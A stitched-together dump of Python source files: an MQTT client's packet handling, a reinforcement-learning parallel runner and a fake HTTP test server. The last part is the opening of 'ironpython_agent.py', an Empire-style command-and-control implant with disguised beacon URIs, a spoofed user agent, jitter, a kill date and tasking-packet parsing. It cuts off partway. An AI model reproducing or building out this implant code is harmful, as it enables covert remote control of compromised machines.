packet.extend(struct.pack("B", t[1])) # packet.append(q)
self._easy_log(MQTT_LOG_DEBUG, "Sending SUBSCRIBE (d"+str(dup)+", m"+str(local_mid)+") ["+ ", ".join(map(lambda t: t[0].decode(), topics)) +"]")
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t)
command = UNSUBSCRIBE | (dup << 3) | 0x2 # (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command)) # packet.append(command)
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
self._easy_log(MQTT_LOG_DEBUG, "Sending UNSUBSCRIBE (d"+str(dup)+", m"+str(local_mid)+") ["+ ", ".join(map(lambda t: t[0].decode(), topics)) +"]")
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
with mutex:
# print("_message_retry_check_actual {}".format(len(messages))) #needed
now = time_func()
for m in messages:
if m.timestamp + self._message_retry < now:
# print("m.state ==", m.state)
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
# m.dup = True
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
# m.dup = True
self._send_pubrel(m.mid) #, True)
def _message_retry_check(self):
# print("_message_retry_check") #needed
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
# print("_messages_reconnect_reset_out") #needed
with self._out_message_mutex:
self._inflight_messages = 0
for m in self._out_messages:
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
# self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
# self._inflight_messages = self._inflight_messages + 1
if self._clean_session:
if m.state != mqtt_ms_publish:
m.dup = True
m.state = mqtt_ms_publish
else:
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
# m.dup = True
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
def _messages_reconnect_reset_in(self):
# print("_messages_reconnect_reset_in") #needed
with self._in_message_mutex:
if self._clean_session:
self._in_messages = []
return
for m in self._in_messages:
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(self._in_messages.index(m))
else:
# Preserve current state
pass
def _messages_reconnect_reset(self):
# print("_messages_reconnect_reset") #needed
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos):
# print("_packet_queue") #needed
mpkt = dict(
command = command,
mid = mid,
qos = qos,
pos = 0,
to_process = len(packet),
packet = packet)
with self._out_packet_mutex:
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
# print("_p_q _current_out_packet =", self._current_out_packet)
self._current_out_packet_mutex.release()
# print("self._out_packet =", self._out_packet)
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
#try:
# self._sockpairW.send(sockpair_data)
#except socket.error as err:
# if err != EAGAIN:
# raise
if self._thread is None:
if self._in_callback_mutex.acquire(False):
self._in_callback_mutex.release()
return self.loop_write()
return MQTT_ERR_SUCCESS
def _packet_handle(self):
# print("_packet_handle")
cmd = self._in_packet['command'] & 0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command "+str(cmd))
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
# print("_handle_connack") #needed
# print(self._in_packet)
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if self._protocol == MQTTv311:
if result == CONNACK_REFUSED_PROTOCOL_VERSION:
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+"), attempting downgrade to MQTT v3.1.")
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
elif (result == CONNACK_REFUSED_IDENTIFIER_REJECTED and self._client_id == b''):
self._easy_log(MQTT_LOG_DEBUG, "NOT IMPLEMENTED - Received CONNACK ("+str(flags)+", "+str(result)+"), attempting to use non-empty CID")
# self._client_id = base62(uuid.uuid4().int, padding=22)
# return self.reconnect()
return MQTT_ERR_CONN_REFUSED
if result == 0:
self._state = mqtt_cs_connected
self._reconnect_delay = None
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+")")
if self.on_connect:
flags_dict = dict()
flags_dict['session present'] = flags & 0x01
with self._in_callback_mutex:
self.on_connect(self, self._userdata, flags_dict, result)
if result == 0:
rc = 0
print("_out_messages length: " + str(len(self._out_messages)))
# print("_out_messages: " + str(self._out_messages))
print("_out_messages: " + str([ "m"+str(m.mid)+" "+str(m.topic)+" : "+str(m.payload) for m in self._out_messages ]))
with self._out_message_mutex:
for m in self._out_messages:
m.timestamp = time_func()
if m.state == mqtt_ms_queued:
print("1577 mqtt_ms_queued loop_write()")
self.loop_write() # Process outgoing messages that have just been queued up
return MQTT_ERR_SUCCESS
if m.qos == 0:
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_puback
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
print("1591 mqtt_ms_wait_for_puback _send_publish()")
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_pubrec
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
print("1600 mqtt_ms_wait_for_pubrec _send_publish()")
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_pubcomp
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
print("1608 mqtt_ms_wait_for_pubcomp _send_pubrel()")
rc = self._send_pubrel(m.mid) #y, m.dup)
if rc != 0:
return rc
print("1612 loop_write()")
self.loop_write() # Process outgoing messages that have just been queued up
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
# print("_handle_suback") #needed after _packet_handle
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet']) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
if self.on_subscribe:
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
self.on_subscribe(self, self._userdata, mid, granted_qos)
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
# print("_handle_publish") #needed after packet_handle
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08) >> 3
message.qos = (header & 0x06) >> 1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet']) - 2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet) - slen) + 's'
(topic, packet) = struct.unpack(pack_format, packet)
if len(topic) == 0:
return MQTT_ERR_PROTOCOL
try:
print_topic = topic.decode('utf-8')
except UnicodeDecodeError:
print_topic = "TOPIC WITH INVALID UTF-8: " + str(topic)
message.topic = topic
if message.qos > 0:
pack_format = "!H" + str(len(packet) - 2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(MQTT_LOG_DEBUG, "Received PUBLISH (d"+str(message.dup)+", q"+str(message.qos)+", r"+str(message.retain)+", m"+str(message.mid)+", '"+print_topic+"', ... ("+str(len(message.payload))+" bytes)")
message.timestamp = time_func()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
with self._in_message_mutex: # .acquire()
self._in_messages.append(message)
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
# mid, = struct.unpack("!H", self._in_packet['packet'])
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: "+str(mid)+")")
with self._in_message_mutex: # .acquire()
for i in range(len(self._in_messages)):
if self._in_messages[i].mid == mid:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
message = self._in_messages.pop(i)
self._handle_on_message(message) # self._in_messages[i]
self._inflight_messages -= 1
if self._max_inflight_messages > 0:
with self._out_message_mutex:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
return self._send_pubcomp(mid)
# return MQTT_ERR_SUCCESS
def _update_inflight(self):
# Dont lock message_mutex here
for m in self._out_messages:
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages += 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
# mid, = struct.unpack("!H", self._in_packet['packet'][:2])
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: "+str(mid)+")")
with self._out_message_mutex:
for m in self._out_messages:
if m.mid == mid:
m.state = mqtt_ms_wait_for_pubcomp
m.timestamp = time_func()
return self._send_pubrel(mid) #, False)
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
# mid, = struct.unpack("!H", self._in_packet['packet'][:2])
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: "+str(mid)+")")
if self.on_unsubscribe:
with self._in_callback_mutex:
self.on_unsubscribe(self, self._userdata, mid)
return MQTT_ERR_SUCCESS
def _do_on_disconnect(self, rc, properties=None):
# with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.user_data_set("dc in _do_on_disconnect")
if properties:
self.on_disconnect(self, self._userdata, rc, properties)
else:
self.on_disconnect(self, self._userdata, rc)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
# if not self.suppress_exceptions:
# raise
def _do_on_publish(self, mid):
# with self._callback_mutex:
if self.on_publish:
with self._in_callback_mutex:
try:
self.on_publish(self, self._userdata, mid)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_publish: %s', err)
# if not self.suppress_exceptions:
# raise
msg = self._out_messages.pop(mid)
# msg.info._set_as_published()
if msg.qos > 0:
self._inflight_messages -= 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'][:2])
# mid = struct.unpack("!H", self._in_packet['packet'])
# mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received "+cmd+" (Mid: "+str(mid)+")")
with self._out_message_mutex:
for i in range(len(self._out_messages)):
try:
if self._out_messages[i].mid == mid:
# Only inform the client the message has been sent once.
if self.on_publish:
with self._in_callback_mutex:
self.on_publish(self, self._userdata, mid)
msg = self._out_messages.pop(i)
if msg.qos > 0:
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
return MQTT_ERR_SUCCESS
except IndexError:
# Have removed item so i>count.
# Not really an error.
pass
return MQTT_ERR_SUCCESS
# with self._out_message_mutex:
# try:
# if mid in self._out_messages:
# # Only inform the client the message has been sent once.
# if self.on_publish:
# with self._in_callback_mutex:
# self.on_publish(self, self._userdata, mid)
# msg = self._out_messages.pop(mid)
# # msg.info._set_as_published()
# if msg.qos > 0:
# self._inflight_messages -= 1
# if self._max_inflight_messages > 0:
# rc = self._update_inflight()
# if rc != MQTT_ERR_SUCCESS:
# return rc
# return MQTT_ERR_SUCCESS
# except IndexError:
# # Have removed item so i>count.
# # Not really an error.
# print("_handle_pubackcomp IndexError")
# pass
# return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
matched = False
try:
topic = message.topic.decode('utf-8')
except UnicodeDecodeError:
topic = None
if topic is not None:
for t in self._on_message_filtered:
if topic_matches_sub(t[0], topic):
with self._in_callback_mutex:
t[1](self, self._userdata, message)
matched = True
if matched == False and self.on_message:
with self._in_callback_mutex:
self.on_message(self, self._userdata, message)
def _thread_main(self):
self.loop_forever(retry_first_connection=True)
def _reconnect_wait(self):
# See reconnect_delay_set for details
now = time_func()
# with self._reconnect_delay_mutex:
if self._reconnect_delay is None:
self._reconnect_delay = self._reconnect_min_delay
else:
self._reconnect_delay = min(
self._reconnect_delay * 2,
self._reconnect_max_delay,
)
target_time = now + self._reconnect_delay
remaining = target_time - now
while (self._state != mqtt_cs_disconnecting
and not self._thread_terminate
and remaining > 0):
sleep(min(remaining, 1))
remaining = target_time - time_func()
def _create_socket_connection(self):
# addr = (self._host, self._port)
# source = (self._bind_address, 0)
# return socket.create_connection(addr, source_address=source, timeout=self._keepalive)
err = None
responses = None
try:
responses = socket.getaddrinfo(self._host, self._port, 0, socket.SOCK_STREAM)
except OSError as err:
self._easy_log(MQTT_LOG_DEBUG, "_create_socket_connection err: %s", err)
if not responses:
raise socket.error("getaddrinfo returns an empty list")
if not isinstance(responses, list):
raise socket.error("getaddrinfo did not return a list")
for res in responses:
self._easy_log(MQTT_LOG_DEBUG, ">> Connecting {}".format(res))
if len(res) >= 5:
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if self._keepalive:
sock.settimeout(self._keepalive)
if self._bind_address:
sock.bind(self._bind_address)
sock.connect(sa)
# Break explicitly a reference cycle
err = None
return sock
except socket.error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
try:
raise err
finally:
# Break explicitly a reference cycle
err = None
# def create_connection(self, address, timeout=-1, source_address=None):
# """Connect to *address* and return the socket object.
# Convenience function. Connect to *address* (a 2-tuple ``(host,
# port)``) and return the socket object. Passing the optional
# *timeout* parameter will set the timeout on the socket instance
# before attempting to connect. If no *timeout* is supplied, the
# global default timeout setting returned by :func:`getdefaulttimeout`
# is used. If *source_address* is set it must be a tuple of (host, port)
# for the socket to bind as a source address before making the connection.
# A host of '' or port 0 tells the OS to use the default.
# """
# host, port = address
# err = None
# responses = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
# print(responses)
# for res in responses:
# print(">> Connecting {}".format(res))
# if len(res) >= 5:
# af, socktype, proto, canonname, sa = res
# sock = None
# try:
# sock = socket.socket(af, socktype, proto)
# if timeout is not -1:
# sock.settimeout(timeout)
# if source_address:
# sock.bind(source_address)
# sock.connect(sa)
# # Break explicitly a reference cycle
# err = None
# return sock
# except socket.error as _:
# err = _
# if sock is not None:
# sock.close()
# if err is not None:
# try:
# raise err
# finally:
# # Break explicitly a reference cycle
# err = None
# else:
# raise socket.error("getaddrinfo returns an empty list")
|
parallel_runner.py
|
from envs import REGISTRY as env_REGISTRY
from functools import partial
from components.episode_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th
# Based (very) heavily on SubprocVecEnv from OpenAI Baselines
# https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py
class ParallelRunner:
def __init__(self, args, logger):
# Get arguments
self.args = args
self.logger = logger
self.batch_size = self.args.batch_size_run
self.best_performance = 0
self.save_model = False
# Make subprocesses for the envs
# zip() is used to join tuples
self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
# Import the environment indicated by args
env_fn = env_REGISTRY[self.args.env]
# Assigning environment object to each thread
self.ps = [Process(target=env_worker, args=(worker_conn, CloudpickleWrapper(partial(env_fn, **self.args.env_args))))
for worker_conn in self.worker_conns]
for p in self.ps:
p.daemon = True
# Start each thread parallelly
p.start()
# After starting threads
# Consult any thread for environment information
self.parent_conns[0].send(("get_env_info", None))
self.env_info = self.parent_conns[0].recv()
# Set episode limit
self.episode_limit = self.env_info["episode_limit"]
self.t = 0
self.t_env = 0
self.train_returns = []
self.test_returns = []
self.train_stats = {}
self.test_stats = {}
self.log_train_stats_t = -100000
def setup(self, scheme, groups, preprocess, mac):
# This setup a new batch method
self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1,
preprocess=preprocess, device=self.args.device)
# Define multi-agent controller here
self.mac = mac
self.scheme = scheme
self.groups = groups
self.preprocess = preprocess
def get_env_info(self):
# Return environment information
return self.env_info
def save_replay(self):
pass
def close_env(self):
for parent_conn in self.parent_conns:
parent_conn.send(("close", None))
def reset(self):
self.batch = self.new_batch()
# Reset the envs by sending in order
for parent_conn in self.parent_conns:
parent_conn.send(("reset", None))
# Pre-transtion data is the data used for determining an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Get the obs, state and avail_actions back
for parent_conn in self.parent_conns:
data = parent_conn.recv()
# Get initial transition state
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Initial state update
self.batch.update(pre_transition_data, ts=0)
self.t = 0
self.env_steps_this_run = 0
def run(self, test_mode=False):
# test_mode if true
# Reset environment for all threads first
self.reset()
all_terminated = False
# initial returns
episode_returns = [0 for _ in range(self.batch_size)]
episode_lengths = [0 for _ in range(self.batch_size)]
self.mac.init_hidden(batch_size=self.batch_size)
# Inidicates if thread running is terminated
terminated = [False for _ in range(self.batch_size)]
# Collects the thread indexes that are not terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
final_env_infos = [] # may store extra stats like battle won. this is filled in ORDER OF TERMINATION
# Start running here
while True:
# Pass the entire batch of experiences up till now to the agents
# Receive the actions for each agent at this timestep in a batch for each un-terminated env
# The 'mac' is a multi-agent controller
# given state information, it will return actions
# self.t_env is the episode number
# self.t is the step in current episode
actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
cpu_actions = actions.to("cpu").numpy()
# Update the actions taken
actions_chosen = {
"actions": actions.unsqueeze(1)
}
self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Send actions to each env
action_idx = 0
for idx, parent_conn in enumerate(self.parent_conns):
if idx in envs_not_terminated: # We produced actions for this env
if not terminated[idx]: # Only send the actions to the env if it hasn't terminated
parent_conn.send(("step", cpu_actions[action_idx]))
action_idx += 1 # actions is not a list over every env
# Update envs_not_terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
all_terminated = all(terminated)
if all_terminated:
break
# Post step data we will insert for the current timestep
post_transition_data = {
"reward": [],
"terminated": []
}
# Data for the next step we will insert in order to select an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Receive data back for each unterminated env
for idx, parent_conn in enumerate(self.parent_conns):
if not terminated[idx]:
data = parent_conn.recv()
# Remaining data for this current timestep
post_transition_data["reward"].append((data["reward"],))
# Return is the summation of reward
episode_returns[idx] += data["reward"]
episode_lengths[idx] += 1
if not test_mode:
self.env_steps_this_run += 1
env_terminated = False
if data["terminated"]:
final_env_infos.append(data["info"])
if data["terminated"] and not data["info"].get("episode_limit", False):
env_terminated = True
terminated[idx] = data["terminated"]
post_transition_data["terminated"].append((env_terminated,))
# Data for the next timestep needed to select an action
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Add post_transiton data into the batch
self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Move onto the next timestep
self.t += 1
# Add the pre-transition data
# pre_transition_data: a dictionary, contains key: state, avail_action, and obs
# bs: envs_not_terminated
self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)
if not test_mode:
self.t_env += self.env_steps_this_run
# Get stats back for each env
for parent_conn in self.parent_conns:
parent_conn.send(("get_stats",None))
env_stats = []
for parent_conn in self.parent_conns:
env_stat = parent_conn.recv()
env_stats.append(env_stat)
cur_stats = self.test_stats if test_mode else self.train_stats
cur_returns = self.test_returns if test_mode else self.train_returns
log_prefix = "test_" if test_mode else ""
infos = [cur_stats] + final_env_infos
cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])})
cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)
cur_returns.extend(episode_returns)
n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
if test_mode and (len(self.test_returns) == n_test_runs):
# Comment by Jing Huang on 11/19/2020
# cur_profit = cur_stats['profit'] / cur_stats['n_episodes']
# print(cur_profit)
# if self.t_env > 1500000:
# # cur_profit = cur_stats['profit'] / cur_stats['n_episodes']
# if cur_profit > self.best_performance:
# self.save_model = True
# self.best_performance = cur_profit
self._log(cur_returns, cur_stats, log_prefix)
elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
self._log(cur_returns, cur_stats, log_prefix)
if hasattr(self.mac.action_selector, "epsilon"):
self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
self.log_train_stats_t = self.t_env
return self.batch
def _log(self, returns, stats, prefix):
self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
returns.clear()
for k, v in stats.items():
if k != "n_episodes":
self.logger.log_stat(prefix + k + "_mean" , v/stats["n_episodes"], self.t_env)
stats.clear()
def env_worker(remote, env_fn):
# Make environment
env = env_fn.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
actions = data
# Take a step in the environment
reward, terminated, env_info = env.step(actions)
# Return the observations, avail_actions and state to make the next action
state = env.get_state()
avail_actions = env.get_avail_actions()
obs = env.get_obs()
remote.send({
# Data for the next timestep needed to pick an action
"state": state,
"avail_actions": avail_actions,
"obs": obs,
# Rest of the data for the current timestep
"reward": reward,
"terminated": terminated,
"info": env_info
})
elif cmd == "reset":
env.reset()
remote.send({
"state": env.get_state(),
"avail_actions": env.get_avail_actions(),
"obs": env.get_obs()
})
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_env_info":
remote.send(env.get_env_info())
elif cmd == "get_stats":
remote.send(env.get_stats())
else:
raise NotImplementedError
class CloudpickleWrapper():
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
|
httpserver.py
|
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import BaseHTTPServer
import httplib
import json
import logging
import threading
_STOP_EVENT = '/fakeserver/__stop__'
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handlers implements utility functions to help implementing a fake."""
### Public methods
def send_json(self, data):
"""Sends a JSON response."""
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
json.dump(data, self.wfile)
def send_octet_stream(self, data):
"""Sends a binary response."""
self.send_response(200)
self.send_header('Content-type', 'application/octet-stream')
self.end_headers()
self.wfile.write(data)
def read_body(self):
"""Reads the request body."""
return self.rfile.read(int(self.headers['Content-Length']))
def yield_body(self):
"""Yields the request body as 4kiB chunks."""
size = int(self.headers['Content-Length'])
while size:
chunk = min(4096, size)
yield self.rfile.read(chunk)
size -= chunk
### Overrides from BaseHTTPRequestHandler
def do_OPTIONS(self):
if self.path == _STOP_EVENT:
self.server.parent._stopped = True
self.send_octet_stream('')
def log_message(self, fmt, *args):
logging.info(
'%s - - [%s] %s', self.address_string(), self.log_date_time_string(),
fmt % args)
class Server(object):
"""Server implements a simple HTTP server to implement a fake."""
_HANDLER_CLS = None
def __init__(self):
assert issubclass(self._HANDLER_CLS, Handler), self._HANDLER_CLS
self._closed = False
self._stopped = False
self._server = BaseHTTPServer.HTTPServer(
('127.0.0.1', 0), self._HANDLER_CLS)
self._server.parent = self
self._server.url = self.url = 'http://127.0.0.1:%d' % (
self._server.server_port)
self._thread = threading.Thread(target=self._run, name='httpd')
self._thread.daemon = True
self._thread.start()
logging.info('%s', self.url)
def close(self):
assert not self._closed
self._closed = True
self._send_event(_STOP_EVENT)
self._thread.join()
def _run(self):
while not self._stopped:
self._server.handle_request()
self._server.server_close()
def _send_event(self, path):
conn = httplib.HTTPConnection(
'127.0.0.1:%d' % self._server.server_port, timeout=60)
try:
conn.request('OPTIONS', path)
conn.getresponse()
finally:
conn.close()
|
ironpython_agent.py
|
import json
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import types
import re
import shutil
import socket
import math
import stat
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
from System import Environment
import clr, System
clr.AddReference("System.Management.Automation")
from System.Management.Automation import Runspaces
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
proxy_list = []
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
if packets is None:
return
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
